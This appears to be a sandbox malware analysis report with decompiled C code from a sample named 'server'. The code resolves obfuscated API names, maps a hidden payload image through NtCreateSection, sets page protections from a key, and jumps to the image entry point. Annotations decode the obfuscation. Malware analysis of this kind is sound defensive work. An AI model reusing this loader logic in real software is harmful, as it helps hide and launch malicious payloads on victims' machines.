                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: SectionView
                    • String ID:
                    • API String ID: 1323581903-0
                    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                    • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
                    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                    • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    (graph image not reproduced in this extraction; basic blocks cover 0x54003c-0x54091d)
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0054024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: 154a888089c45a34402e680f3c48991356cd843d6438e7c360382ace7e0c66c3
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: F0526974A01229DFDB64CF58C984BA8BBB1BF09304F1480D9E54DAB291DB30AE95DF15
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    (graph image not reproduced in this extraction; basic blocks cover 0x401202-0x4012e3)
                    C-Code - Quality: 100%
                     			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                     				// Allocates a 0x20-byte context, fills it with five exports resolved by name plus the
                     				// caller's size and flag values, and hands it to E0040110B (NtCreateSection, see APIs).
                     				// Returns 0 on success, otherwise a Win32 error code; the context is written through
                     				// _a16 only on success and freed on every failure path.
                     				intOrPtr _v8;
                     				_Unknown_base(*)()* _t29;
                     				_Unknown_base(*)()* _t33;
                     				_Unknown_base(*)()* _t36;
                     				_Unknown_base(*)()* _t39;
                     				_Unknown_base(*)()* _t42;
                     				intOrPtr _t46;
                     				struct HINSTANCE__* _t50;
                     				intOrPtr _t56;
                     
                     				_t56 = E004012E6(0x20); // context from the private heap (RtlAllocateHeap)
                     				if(_t56 == 0) {
                     					_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
                     				} else {
                     					// *0x404184 is a delta added to every string address, so neither the module name
                     					// nor the export names appear as direct pointers in the code
                     					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
                     					_v8 = 0x7f; // ERROR_PROC_NOT_FOUND, returned if any lookup below yields NULL
                     					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
                     					 *(_t56 + 0xc) = _t29; // resolved exports fill slots +0xc, +0x10, +0x14, +0x18, +0x1c
                     					if(_t29 == 0) {
                     						L8:
                     						E00401BA9(_t56); // RtlFreeHeap of the context on any failure
                     					} else {
                     						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
                     						 *(_t56 + 0x10) = _t33;
                     						if(_t33 == 0) {
                     							goto L8;
                     						} else {
                     							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
                     							 *(_t56 + 0x14) = _t36;
                     							if(_t36 == 0) {
                     								goto L8;
                     							} else {
                     								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
                     								 *(_t56 + 0x18) = _t39;
                     								if(_t39 == 0) {
                     									goto L8;
                     								} else {
                     									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
                     									 *(_t56 + 0x1c) = _t42;
                     									if(_t42 == 0) {
                     										goto L8;
                     									} else {
                     										 *((intOrPtr*)(_t56 + 8)) = _a8; // third caller argument (a key-derived value at the E004012FB call site), consumed by E0040110B
                     										 *((intOrPtr*)(_t56 + 4)) = _a4; // section size (E004012FB passes the rounded SizeOfImage)
                     										_t46 = E0040110B(_t56, _a12); // executed: NtCreateSection + memset (see APIs); result stored through _a12
                     										_v8 = _t46;
                     										if(_t46 != 0) {
                     											goto L8;
                     										} else {
                     											 *_a16 = _t56; // caller keeps the context for later teardown
                     										}
                     									}
                     								}
                     							}
                     						}
                     					}
                     				}
                     				return _v8;
                     			}
                     

                    APIs
                      • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                    • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                    • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                      • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76684EE0,00000000,00000000,?), ref: 00401168
                      • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                    • String ID:
                    • API String ID: 3012371009-0
                    • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
                    • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
                    • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
                    • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 100%
                     			_entry_() {
                     				void* _t1;
                     				int _t4;
                     				int _t6;
                     
                     				_t6 = 0;
                     				_t1 = HeapCreate(0, 0x400000, 0); // executed: private growable heap, 4 MB initial size
                     				 *0x404160 = _t1; // heap handle used by E004012E6 / E00401BA9
                     				if(_t1 != 0) {
                     					 *0x404170 = GetModuleHandleA(0); // own image base
                     					GetCommandLineW(); // executed: return value unused in this decompilation
                     					_t4 = E004019F1(); // executed: main routine; its subcalls include NtQuerySystemInformation, Sleep and the locale/UI-language APIs listed below
                     					_t6 = _t4;
                     					HeapDestroy( *0x404160);
                     				}
                     				ExitProcess(_t6); // exit code is whatever E004019F1 returned
                     			}
                     

                    APIs
                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401DEB
                    • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
                    • GetCommandLineW.KERNEL32 ref: 00401E06
                      • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL ref: 00401A26
                      • Part of subcall function 004019F1: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                      • Part of subcall function 004019F1: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                      • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                      • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                      • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
                      • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
                    • HeapDestroy.KERNEL32 ref: 00401E19
                    • ExitProcess.KERNEL32 ref: 00401E20
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
                    • String ID:
                    • API String ID: 1863574965-0
                    • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                    • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
                    • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                    • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

(control-flow graph rendering omitted; basic blocks 540005-54091d in the non-PE region at 0x540000, with calls to 54092b, 54003c, 540e0f, 540d90, VirtualAlloc, 540a69, VirtualProtect, 540cce, 540ce7, VirtualFree and LoadLibraryA)
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0054024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
                    • Instruction ID: b3d7a32aeb9f4883534c5e4c992b648fa1dc61d68ef5eecc71f663662e3bc53c
                    • Opcode Fuzzy Hash: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
                    • Instruction Fuzzy Hash: 6FC19BB5D01228EFDF60CFA8D985BDDBBB5BF08304F208099E548A7252DB319A94DF11
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

(control-flow graph rendering omitted; basic blocks 4014cf-4015ad with calls to VirtualProtect x2 and GetLastError)
                    C-Code - Quality: 87%
                     			E004014CF(void* __eax, void* _a4) {
                     				// __eax = IMAGE_NT_HEADERS of the mapped image, _a4 = its base. Applies a page
                     				// protection to the headers and to every section; returns 0 or the last
                     				// VirtualProtect error. Every PAGE_* value is computed from the key in *0x404180.
                     				signed int _v8;
                     				signed int _v12;
                     				signed int _v16;
                     				long _v20;
                     				int _t42;
                     				long _t53;
                     				intOrPtr _t56;
                     				void* _t57;
                     				signed int _t59;
                     
                     				_v12 = _v12 & 0x00000000; // result: 0 until a VirtualProtect fails
                     				_t56 =  *0x404180; // runtime key
                     				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18; // first IMAGE_SECTION_HEADER = NT headers + 0x18 + FileHeader.SizeOfOptionalHeader
                     				_v16 =  *(__eax + 6) & 0x0000ffff; // FileHeader.NumberOfSections
                     				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed: headers (OptionalHeader.SizeOfHeaders) get the same protection as the L8 default below
                     				_v8 = _v8 & 0x00000000; // section index
                     				if(_v16 <= 0) {
                     					L12:
                     					return _v12;
                     				} else {
                     					goto L1;
                     				}
                     				while(1) {
                     					L1:
                     					_t59 = _v12;
                     					if(_t59 != 0) {
                     						goto L12; // stop at the first error
                     					}
                     					// The bt instructions test single bits of Section.Characteristics (+0x24); the
                     					// decompiler lost the bit index held in eax, so only the branch shape survives.
                     					asm("bt [esi+0x24], eax");
                     					if(_t59 >= 0) { // ">= 0" here stands for carry clear, i.e. bit not set
                     						asm("bt [esi+0x24], eax");
                     						if(__eflags >= 0) {
                     							L8:
                     							_t53 = _t56 - 0x43175abf; // default protection
                     							L9:
                     							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed: base + VirtualAddress, Misc.VirtualSize
                     							if(_t42 == 0) {
                     								_v12 = GetLastError();
                     							}
                     							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28; // next header: sizeof(IMAGE_SECTION_HEADER) is 0x28, so the key-derived multiplier has to wrap to 1
                     							// The only such multiplier that also turns every constant in this function into a
                     							// valid PAGE_* flag gives key = 0x43175ac3, under which the four subtractions decode
                     							// to 4, 2, 0x20 and 0x40 (PAGE_READWRITE, PAGE_READONLY, PAGE_EXECUTE_READ,
                     							// PAGE_EXECUTE_READWRITE). This is an inference from the arithmetic shown here.
                     							_v8 = _v8 + 1;
                     							if(_v8 < _v16) {
                     								continue;
                     							} else {
                     								goto L12;
                     							}
                     						}
                     						asm("bt [esi+0x24], eax");
                     						_t53 = _t56 - 0x43175ac1; // read-only protection
                     						if(__eflags >= 0) {
                     							goto L9;
                     						}
                     						goto L8;
                     					}
                     					asm("bt [esi+0x24], eax");
                     					if(_t59 >= 0) {
                     						_t53 = _t56 - 0x43175aa3; // execute protection
                     					} else {
                     						_t53 = _t56 - 0x43175a83; // execute + write protection
                     					}
                     					goto L9;
                     				}
                     				goto L12;
                     			}
                     

                    APIs
                    • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
                    • GetLastError.KERNEL32 ref: 00401583
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: ProtectVirtual$ErrorLast
                    • String ID:
                    • API String ID: 1469625949-0
                    • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
                    • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
                    • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
                    • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

(control-flow graph rendering omitted; basic blocks 40139f-401452 with calls to E00401D3C, E00401882, lstrlenW, E004015B0, L00401FE6, E004012FB and ExitThread)
                    C-Code - Quality: 100%
                     			E0040139F() {
                     				// Thread routine (ends in ExitThread): builds a security descriptor, obtains the
                     				// payload image through E00401882 and loads it with E004012FB.
                     				char _v16;
                     				intOrPtr _v28;
                     				void _v32;
                     				void* _v36;
                     				intOrPtr _t15;
                     				void* _t16;
                     				void* _t24;
                     				long _t25;
                     				int _t26;
                     				void* _t30;
                     				intOrPtr* _t32;
                     				signed int _t35;
                     				intOrPtr _t38;
                     
                     				_t15 =  *0x404184; // string-address delta
                     				if( *0x40416c > 5) { // picks one of two strings on a stored value compared against 5; the page does not show what 0x40416c holds
                     					_t16 = _t15 + 0x40513c;
                     				} else {
                     					_t16 = _t15 + 0x40529c;
                     				}
                     				E00401D3C(_t16, _t16); // SDDL string -> SECURITY_ATTRIBUTES at 0x404188 (see E00401D3C)
                     				_t35 = 6;
                     				memset( &_v32, 0, _t35 << 2); // zero the 6-dword result structure
                     				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed: fills _v32; its second dword (_v28) is the image handed to E004012FB. The third argument is derived from the runtime key
                     				if(_t24 == 0) {
                     					_t25 = 0xb; // ERROR_BAD_FORMAT
                     				} else {
                     					_t26 = lstrlenW( *0x404178);
                     					_t8 = _t26 + 2; // 0x2
                     					_t11 = _t26 + _t8 + 8; // 0xa : 2*(len+1) bytes of wide string plus an 8-byte header
                     					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed: allocate that buffer, pointer returned in _v36
                     					if(_t30 == 0) {
                     						_t32 = _v36;
                     						 *_t32 = 0;
                     						if( *0x404178 == 0) {
                     							 *((short*)(_t32 + 4)) = 0; // empty wide string
                     						} else {
                     							L00401FE6(_t32 + 4); // copies a wide string to +4 (source not visible in this decompilation)
                     						}
                     					}
                     					_t25 = E004012FB(_v28); // executed: map and run the image
                     				}
                     				ExitThread(_t25);
                     			}
                     

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: ExitThreadlstrlen
                    • String ID:
                    • API String ID: 2636182767-0
                    • Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
                    • Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
                    • Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
                    • Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

(control-flow graph rendering omitted; basic blocks 540e0f-540e2c with two SetErrorMode calls)
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,00540223,?,?), ref: 00540E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,00540223,?,?), ref: 00540E1E
                    Memory Dump Source
                    • Source File: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_540000_server.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: 8c4bb27ebef91340a8cc9f03cc0e2f213876f804ecf9a794f7e7c0ac875d06d5
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: 5FD0123114512877D7002A94DC09BCD7F1CDF05B66F108411FB0DD9080C770995046E5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 37%
                     			E00401D3C(void* __eax, intOrPtr _a4) {
                     				// Builds a SECURITY_ATTRIBUTES at 0x404188 whose descriptor comes from the SDDL
                     				// string _a4 (ConvertStringSecurityDescriptorToSecurityDescriptorA, see APIs).
                     
                     				 *0x404190 =  *0x404190 & 0x00000000; // bInheritHandle = FALSE
                     				_push(0); // SecurityDescriptorSize = NULL
                     				_push(0x40418c); // &lpSecurityDescriptor
                     				_push(1); // SDDL_REVISION_1
                     				_push(_a4); // StringSecurityDescriptor
                     				 *0x404188 = 0xc; // executed: nLength = sizeof(SECURITY_ATTRIBUTES) on 32-bit
                     				L00401682(); // executed: ConvertStringSecurityDescriptorToSecurityDescriptorA thunk
                     				return __eax;
                     			}
                     

                    APIs
                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: DescriptorSecurity$ConvertString
                    • String ID:
                    • API String ID: 3907675253-0
                    • Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
                    • Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
                    • Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
                    • Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

(control-flow graph rendering omitted; single basic block 4012e6-4012f8 calling RtlAllocateHeap)
                    C-Code - Quality: 100%
                     			E004012E6(long _a4) {
                     				void* _t2;
                     
                     				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed: _a4 bytes from the private heap created in _entry_; NULL on failure
                     				return _t2;
                     			}
                     

                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
                    • Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
                    • Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
                    • Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

(control-flow graph rendering omitted; single basic block 401ba9-401bbb calling RtlFreeHeap)
                    C-Code - Quality: 100%
                     			E00401BA9(void* _a4) {
                     				char _t2;
                     
                     				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed: returns _a4 to the private heap created in _entry_
                     				return _t2;
                     			}
                     

                    APIs
                    • RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
                    • Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
                    • Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
                    • Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E004012FB(void* __eax) {
                    				char _v8;
                    				void* _v12;
                    				void* __edi;
                    				void* _t18;
                    				long _t24;
                    				long _t26;
                    				long _t29;
                    				intOrPtr _t40;
                    				void* _t41;
                    				void* _t42;
                    				void* _t44;
                    
                    				_t41 = __eax;
                    				_t16 =  *0x404180;
                    				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
                    				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
                    				if(_t18 != 0) {
                    					_t29 = 8;
                    					goto L8;
                    				} else {
                    					_t40 = _v8;
                    					_t29 = E00401BC4(_t33, _t40, _t41);
                    					if(_t29 == 0) {
                    						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                    						_t24 = E00401000(_t40, _t44); // executed
                    						_t29 = _t24;
                    						if(_t29 == 0) {
                    							_t26 = E004014CF(_t44, _t40); // executed
                    							_t29 = _t26;
                    							if(_t29 == 0) {
                    								_push(_t26);
                    								_push(1);
                    								_push(_t40);
                    								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                    									_t29 = GetLastError();
                    								}
                    							}
                    						}
                    					}
                    					_t42 = _v12;
                    					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                    					E00401BA9(_t42);
                    					L8:
                    					return _t29;
                    				}
                    			}

                    APIs
                      • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                      • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                      • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                      • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                      • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                      • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                      • Part of subcall function 00401000: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
                      • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                      • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
                      • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
                    • GetLastError.KERNEL32(?,?), ref: 00401379
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                    • String ID:
                    • API String ID: 3135819546-0
                    • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
                    • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
                    • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
                    • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00541FCF: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00541C63), ref: 00541FDE
                      • Part of subcall function 00541FCF: GetVersion.KERNEL32(?,00541C63), ref: 00541FED
                      • Part of subcall function 00541FCF: GetCurrentProcessId.KERNEL32(?,00541C63), ref: 00542009
                      • Part of subcall function 00541FCF: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00541C63), ref: 00542022
